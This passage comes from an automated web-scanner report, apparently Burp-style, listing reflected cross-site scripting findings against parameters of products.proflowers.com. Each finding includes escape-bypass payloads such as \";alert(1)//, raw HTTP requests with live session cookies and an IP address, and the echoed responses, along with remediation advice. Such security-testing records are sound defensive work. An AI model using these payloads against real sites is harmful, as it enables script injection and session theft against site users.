Cookie: uat=1_1304506950; cmp=1_1304695062_13981:0_13479:0_15758:159333_12704:159333_4895:587518_10164:951794_10638:951794_10640:951794_10641:951794_1437:951794_1660:1515390; uid=1_1304695062_1303179323923:6792170478871670; kwd=1_1304695062_12936:0_11317:951794_11717:951794_11718:951794_11719:951794; sit=1_1304695062_3455:0:0_2988:222280:188109_3801:334723:334303_1714:619256:587518_3306:846882:159333_719:952621:951794_2451:1003490:998390_3236:1161453:1161335_782:1515739:1515390; cre=1_1304695062_29802:59536:1:334091_29805:59534:1:334752; bpd=1_1304695062_1ZCU5:3YJ3; apd=1_1304695062; scg=1_1304695062; ppd=1_1304695062; afl=1_1304695062

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304902976_13981:207914_13479:207914_15758:367247_12704:367247_4895:795432_10164:1159708_10638:1159708_10640:1159708_10641:1159708_1437:1159708_1660:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: uid=1_1304902976_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: kwd=1_1304902976_12936:207914_11317:1159708_11717:1159708_11718:1159708_11719:1159708; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: sit=1_1304902976_3455:207914:207914_2988:430194:396023_3801:542637:542217_1714:827170:795432_3306:1054796:367247_719:1160535:1159708_2451:1211404:1206304_3236:1369367:1369249_782:1723653:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: cre=1_1304902976_29802:59536:1:542005_29805:59534:1:542666; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: bpd=1_1304902976_1ZCU5:4QOV; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: apd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: scg=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: ppd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: afl=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:02:56 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing2ccab<x style=x:expression(alert(1))>059125350e6' *not* found -->
4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141b9\"%3balert(1)//08331235fa2 was submitted in the Ref parameter. This input was echoed as 141b9\\";alert(1)//08331235fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef141b9\"%3balert(1)//08331235fa2 HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:39 GMT
Content-Length: 150181


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050137","30050137","30050137","428685","27","HomeNoRef141b9\\";alert(1)//08331235fa2","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...
4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e13\"%3balert(1)//07e77d7addd was submitted in the tile parameter. This input was echoed as c3e13\\";alert(1)//07e77d7addd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carouselc3e13\"%3balert(1)//07e77d7addd&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:07 GMT
Content-Length: 148302


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
tpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_carouselc3e13\\";alert(1)//07e77d7addd" != "")
           {
               s.eVar20="PFC_hmpg_carouselc3e13\\";alert(1)//07e77d7addd_";
           }
           s.eVar37=cleanString("PFC:Product:30050137_Deluxe Mother...s Day Bouquet");
           s.eVar51="HPC";
           s.events =
...[SNIP]...
4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2010f\"%3balert(1)//114dc093c72 was submitted in the trackingpgroup parameter. This input was echoed as 2010f\\";alert(1)//114dc093c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC2010f\"%3balert(1)//114dc093c72&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:11:28 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:11:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:11:28 GMT
Content-Length: 143627


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
");
           s.prop1 = cleanString("PFC:Product:30050137-DeluxeMother...sDayBouquet");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           else if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCart" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           
...[SNIP]...
4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f678a\"%3balert(1)//17f597f93ba was submitted in the Ref parameter. This input was echoed as f678a\\";alert(1)//17f597f93ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoReff678a\"%3balert(1)//17f597f93ba HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:36:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:36:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:25 GMT
Content-Length: 143975


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30008396","30008396","30008396","293461","27","HomeNoReff678a\\";alert(1)//17f597f93ba","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...
4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the tile request parameter is copied into a JavaScript rest-of-line comment. The payload 702ee%0aalert(1)//1c7004ec03a was submitted in the tile parameter. This input was echoed as 702ee
alert(1)//1c7004ec03a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373702ee%0aalert(1)//1c7004ec03a&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:34:18 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:34:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:18 GMT
Content-Length: 142585


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
pod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a" != "")
           {
               s.eVar20="PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS
...[SNIP]...
4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38208\"%3balert(1)//9789dc0b2fb was submitted in the trackingpgroup parameter. This input was echoed as 38208\\";alert(1)//9789dc0b2fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS38208\"%3balert(1)//9789dc0b2fb&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
